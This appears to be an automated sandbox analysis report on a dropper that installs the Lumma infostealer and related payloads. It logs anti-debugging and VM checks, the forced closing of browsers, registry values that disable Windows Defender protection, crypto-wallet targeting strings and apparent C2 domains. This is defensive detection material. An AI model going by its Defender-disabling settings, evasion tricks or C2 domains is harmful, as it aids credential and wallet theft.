Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp, cfc45d1c7c.exe, cfc45d1c7c.exe, 0000000A.00000002.3020466673.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3020511421.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000001E.00000002.2936782948.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~}
Source: firefox.exe, 0000002E.00000002.3053234298.000002086D9F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: 686764db73.exe, 0000000B.00000002.2749590843.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000131F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(e6
Source: skotes.exe, 00000006.00000002.3026230635.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3026230635.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2589470745.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2585677773.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000002.2589470745.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, Lumma111.exe, 00000009.00000003.2583324357.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2648282111.0000000001364000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000000B.00000002.2749590843.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp, 686764db73.exe, 0000001E.00000002.2943159738.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001F.00000002.2940229329.000001994D617000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 686764db73.exe, 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware6
Source: cfc45d1c7c.exe, 0000000C.00000002.3028749334.000000000134E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~i
Source: file.exe, 00000000.00000002.1812779261.0000000000BC4000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1838874066.0000000000294000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1839210797.0000000000294000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp, cfc45d1c7c.exe, 0000000A.00000002.3020466673.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3020511421.0000000000955000.00000040.00000001.01000000.0000000C.sdmp, 686764db73.exe, 0000001E.00000002.2936782948.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000010.00000002.2817490674.000001F7A3248000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928265482.000001994D29A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2942305835.000001994DA40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2937739211.000001B63A580000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_04A500DD Start: 04A504CD End: 04A500F8 6_2_04A500DD
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053A0E2D rdtsc 0_2_053A0E2D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000D652B mov eax, dword ptr fs:[00000030h] 6_2_000D652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000DA302 mov eax, dword ptr fs:[00000030h] 6_2_000DA302
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Lumma111.exe String found in binary or memory: p3ar11fter.sbs
Source: Lumma111.exe String found in binary or memory: 3xp3cts1aim.sbs
Source: Lumma111.exe String found in binary or memory: peepburry828.sbs
Source: Lumma111.exe String found in binary or memory: p10tgrace.sbs
Source: Lumma111.exe String found in binary or memory: processhol.sbs
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe "C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe "C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe "C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe "C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe "C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe "C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 064deba48e.exe, 0000000D.00000002.2856707163.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp, 064deba48e.exe, 00000022.00000002.3021178012.0000000000B02000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.3020842018.0000000000294000.00000040.00000001.01000000.00000008.sdmp, Lumma111.exe, Lumma111.exe, 00000009.00000002.2584553556.000000000056D000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Program Manager
Source: 686764db73.exe, 0000000B.00000002.2748229015.0000000000528000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: qProgram Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BD3E2 cpuid 6_2_000BD3E2
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000BCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_000BCBEA
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry value created: TamperProtection 0
Source: cfc45d1c7c.exe, 0000000A.00000003.2802924408.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2784475284.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2783308576.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2854456366.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774224287.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2853943836.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774972307.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935431689.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2774224287.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: cfc45d1c7c.exe, 0000000C.00000003.2998396077.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000002.3033495158.00000000013CF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Defender\MsMpeng.exe
Source: cfc45d1c7c.exe, 0000000A.00000003.2853303598.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2935895304.00000000013AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1812668708.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1798707476.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1839124427.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3019605057.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1772336751.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1798579640.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2277265431.0000000004840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1838802300.00000000000A1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2776187475.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 4148, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001E.00000002.2934072138.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2746064201.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2705375842.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2842925428.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: cfc45d1c7c.exe String found in binary or memory: Wallets/Electrum-LTC
Source: cfc45d1c7c.exe String found in binary or memory: Wallets/ElectronCash
Source: cfc45d1c7c.exe String found in binary or memory: window-state.json
Source: cfc45d1c7c.exe String found in binary or memory: Jaxx Liberty
Source: cfc45d1c7c.exe, 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"j
Source: cfc45d1c7c.exe, 0000000A.00000003.2748043293.00000000013D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: cfc45d1c7c.exe, 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance<
Source: cfc45d1c7c.exe String found in binary or memory: %appdata%\Ethereum
